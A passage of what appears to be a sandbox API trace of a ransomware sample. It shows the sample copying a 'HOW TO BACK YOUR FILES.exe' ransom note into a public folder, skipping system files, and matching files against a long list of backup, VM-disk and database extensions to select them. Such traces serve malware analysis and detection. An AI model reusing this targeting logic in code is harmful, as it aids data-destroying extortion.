(HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0039.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ed0c8 [0039.627] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7c90 [0039.627] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0039.627] FindClose (in: hFindFile=0x2c9b10 | out: hFindFile=0x2c9b10) returned 1 [0039.627] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0039.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0039.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed0c8 | out: hHeap=0x2b0000) returned 1 [0039.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0039.627] lstrlenW (lpString="C:\\Users\\Public\\Videos") returned 22 [0039.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0039.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\videos\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.632] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x494f7340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0039.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.632] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.632] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.632] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x494f7340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.632] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.632] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.632] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.633] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.633] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.633] lstrlenW (lpString="desktop.ini") returned 11 [0039.633] lstrlenW (lpString="C:\\Users\\Public\\Videos\\*") returned 24 [0039.633] lstrcpyW (in: lpString1=0x2cce42e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.633] lstrlenW (lpString="desktop.ini") returned 11 [0039.633] lstrlenW (lpString="Ares865") returned 7 [0039.633] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.633] lstrlenW (lpString=".dll") returned 4 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.633] lstrlenW (lpString=".lnk") returned 4 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.633] lstrlenW (lpString=".ini") returned 4 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.633] lstrlenW (lpString=".sys") returned 4 [0039.633] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.633] lstrlenW (lpString="desktop.ini") returned 11 [0039.633] lstrlenW (lpString="bak") returned 3 [0039.633] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.680] lstrlenW (lpString="ba_") returned 3 [0039.680] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.680] lstrlenW (lpString="dbb") returned 3 [0039.680] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.680] lstrlenW (lpString="vmdk") returned 4 [0039.680] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.680] lstrlenW (lpString="rar") returned 3 [0039.680] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.681] lstrlenW (lpString="zip") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.681] lstrlenW (lpString="tgz") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.681] lstrlenW (lpString="vbox") returned 4 [0039.681] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.681] lstrlenW (lpString="vdi") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.681] lstrlenW (lpString="vhd") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.681] lstrlenW (lpString="vhdx") returned 4 [0039.681] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.681] lstrlenW (lpString="avhd") returned 4 [0039.681] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.681] lstrlenW (lpString="db") returned 2 [0039.681] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.681] lstrlenW (lpString="db2") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.681] lstrlenW (lpString="db3") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.681] lstrlenW (lpString="dbf") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.681] lstrlenW (lpString="mdf") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.681] lstrlenW (lpString="mdb") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.681] lstrlenW (lpString="sql") returned 3 [0039.681] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.681] lstrlenW (lpString="sqlite") returned 6 [0039.681] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.681] lstrlenW (lpString="sqlite3") returned 7 [0039.681] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.681] lstrlenW (lpString="sqlitedb") returned 8 [0039.681] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.681] lstrlenW (lpString="xml") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.682] lstrlenW (lpString="$er") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.682] lstrlenW (lpString="4dd") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.682] lstrlenW (lpString="4dl") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.682] lstrlenW (lpString="^^^") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.682] lstrlenW (lpString="abs") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.682] lstrlenW (lpString="abx") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.682] lstrlenW (lpString="accdb") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.682] lstrlenW (lpString="accdc") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.682] lstrlenW (lpString="accde") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.682] lstrlenW (lpString="accdr") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.682] lstrlenW (lpString="accdt") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.682] lstrlenW (lpString="accdw") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.682] lstrlenW (lpString="accft") returned 5 [0039.682] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.682] lstrlenW (lpString="adb") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.682] lstrlenW (lpString="adb") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.682] lstrlenW (lpString="ade") returned 3 [0039.682] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.682] lstrlenW (lpString="adf") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.683] lstrlenW (lpString="adn") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.683] lstrlenW (lpString="adp") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.683] lstrlenW (lpString="alf") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.683] lstrlenW (lpString="ask") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.683] lstrlenW (lpString="btr") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.683] lstrlenW (lpString="cat") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.683] lstrlenW (lpString="cdb") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.683] lstrlenW (lpString="ckp") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.683] lstrlenW (lpString="cma") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.683] lstrlenW (lpString="cpd") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.683] lstrlenW (lpString="dacpac") returned 6 [0039.683] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.683] lstrlenW (lpString="dad") returned 3 [0039.683] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.683] lstrlenW (lpString="dadiagrams") returned 10 [0039.683] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.683] lstrlenW (lpString="daschema") returned 8 [0039.683] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.683] lstrlenW (lpString="db-journal") returned 10 [0039.683] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.683] lstrlenW (lpString="db-shm") returned 6 [0039.683] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.683] lstrlenW (lpString="db-wal") returned 6 [0039.683] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.684] lstrlenW (lpString="dbc") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.684] lstrlenW (lpString="dbs") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.684] lstrlenW (lpString="dbt") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.684] lstrlenW (lpString="dbv") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.684] lstrlenW (lpString="dbx") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.684] lstrlenW (lpString="dcb") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.684] lstrlenW (lpString="dct") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.684] lstrlenW (lpString="dcx") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.684] lstrlenW (lpString="ddl") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.684] lstrlenW (lpString="dlis") returned 4 [0039.684] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.684] lstrlenW (lpString="dp1") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.684] lstrlenW (lpString="dqy") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.684] lstrlenW (lpString="dsk") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.684] lstrlenW (lpString="dsn") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.684] lstrlenW (lpString="dtsx") returned 4 [0039.684] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.684] lstrlenW (lpString="dxl") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.684] lstrlenW (lpString="eco") returned 3 [0039.684] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.684] lstrlenW (lpString="ecx") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.685] lstrlenW (lpString="edb") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.685] lstrlenW (lpString="epim") returned 4 [0039.685] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.685] lstrlenW (lpString="fcd") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.685] lstrlenW (lpString="fdb") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.685] lstrlenW (lpString="fic") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.685] lstrlenW (lpString="flexolibrary") returned 12 [0039.685] lstrlenW (lpString="fm5") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.685] lstrlenW (lpString="fmp") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.685] lstrlenW (lpString="fmp12") returned 5 [0039.685] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.685] lstrlenW (lpString="fmpsl") returned 5 [0039.685] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.685] lstrlenW (lpString="fol") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.685] lstrlenW (lpString="fp3") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.685] lstrlenW (lpString="fp4") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.685] lstrlenW (lpString="fp5") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.685] lstrlenW (lpString="fp7") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.685] lstrlenW (lpString="fpt") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.685] lstrlenW (lpString="frm") returned 3 [0039.685] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.685] lstrlenW (lpString="gdb") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.686] lstrlenW (lpString="gdb") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.686] lstrlenW (lpString="grdb") returned 4 [0039.686] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.686] lstrlenW (lpString="gwi") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.686] lstrlenW (lpString="hdb") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.686] lstrlenW (lpString="his") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.686] lstrlenW (lpString="ib") returned 2 [0039.686] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.686] lstrlenW (lpString="idb") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.686] lstrlenW (lpString="ihx") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.686] lstrlenW (lpString="itdb") returned 4 [0039.686] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.686] lstrlenW (lpString="itw") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.686] lstrlenW (lpString="jet") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.686] lstrlenW (lpString="jtx") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.686] lstrlenW (lpString="kdb") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.686] lstrlenW (lpString="kexi") returned 4 [0039.686] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.686] lstrlenW (lpString="kexic") returned 5 [0039.686] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.686] lstrlenW (lpString="kexis") returned 5 [0039.686] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.686] lstrlenW (lpString="lgc") returned 3 [0039.686] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.687] lstrlenW (lpString="lwx") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.687] lstrlenW (lpString="maf") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.687] lstrlenW (lpString="maq") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.687] lstrlenW (lpString="mar") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.687] lstrlenW (lpString="marshal") returned 7 [0039.687] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.687] lstrlenW (lpString="mas") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.687] lstrlenW (lpString="mav") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.687] lstrlenW (lpString="maw") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.687] lstrlenW (lpString="mdbhtml") returned 7 [0039.687] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.687] lstrlenW (lpString="mdn") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.687] lstrlenW (lpString="mdt") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.687] lstrlenW (lpString="mfd") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.687] lstrlenW (lpString="mpd") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.687] lstrlenW (lpString="mrg") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.687] lstrlenW (lpString="mud") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.687] lstrlenW (lpString="mwb") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.687] lstrlenW (lpString="myd") returned 3 [0039.687] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.687] lstrlenW (lpString="ndf") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.688] lstrlenW (lpString="nnt") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.688] lstrlenW (lpString="nrmlib") returned 6 [0039.688] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.688] lstrlenW (lpString="ns2") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.688] lstrlenW (lpString="ns3") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.688] lstrlenW (lpString="ns4") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.688] lstrlenW (lpString="nsf") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.688] lstrlenW (lpString="nv") returned 2 [0039.688] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.688] lstrlenW (lpString="nv2") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.688] lstrlenW (lpString="nwdb") returned 4 [0039.688] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.688] lstrlenW (lpString="nyf") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.688] lstrlenW (lpString="odb") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.688] lstrlenW (lpString="odb") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.688] lstrlenW (lpString="oqy") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.688] lstrlenW (lpString="ora") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.688] lstrlenW (lpString="orx") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.688] lstrlenW (lpString="owc") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.688] lstrlenW (lpString="p96") returned 3 [0039.688] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.688] lstrlenW (lpString="p97") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.689] lstrlenW (lpString="pan") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.689] lstrlenW (lpString="pdb") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.689] lstrlenW (lpString="pdm") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.689] lstrlenW (lpString="pnz") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.689] lstrlenW (lpString="qry") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.689] lstrlenW (lpString="qvd") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.689] lstrlenW (lpString="rbf") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.689] lstrlenW (lpString="rctd") returned 4 [0039.689] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.689] lstrlenW (lpString="rod") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.689] lstrlenW (lpString="rodx") returned 4 [0039.689] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.689] lstrlenW (lpString="rpd") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.689] lstrlenW (lpString="rsd") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.689] lstrlenW (lpString="sas7bdat") returned 8 [0039.689] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.689] lstrlenW (lpString="sbf") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.689] lstrlenW (lpString="scx") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.689] lstrlenW (lpString="sdb") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.689] lstrlenW (lpString="sdc") returned 3 [0039.689] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.690] lstrlenW (lpString="sdf") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.690] lstrlenW (lpString="sis") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.690] lstrlenW (lpString="spq") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.690] lstrlenW (lpString="te") returned 2 [0039.690] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.690] lstrlenW (lpString="teacher") returned 7 [0039.690] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.690] lstrlenW (lpString="tmd") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.690] lstrlenW (lpString="tps") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.690] lstrlenW (lpString="trc") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.690] lstrlenW (lpString="trc") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.690] lstrlenW (lpString="trm") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.690] lstrlenW (lpString="udb") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.690] lstrlenW (lpString="udl") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.690] lstrlenW (lpString="usr") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.690] lstrlenW (lpString="v12") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.690] lstrlenW (lpString="vis") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.690] lstrlenW (lpString="vpd") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.690] lstrlenW (lpString="vvv") returned 3 [0039.690] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.691] lstrlenW (lpString="wdb") returned 3 [0039.691] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 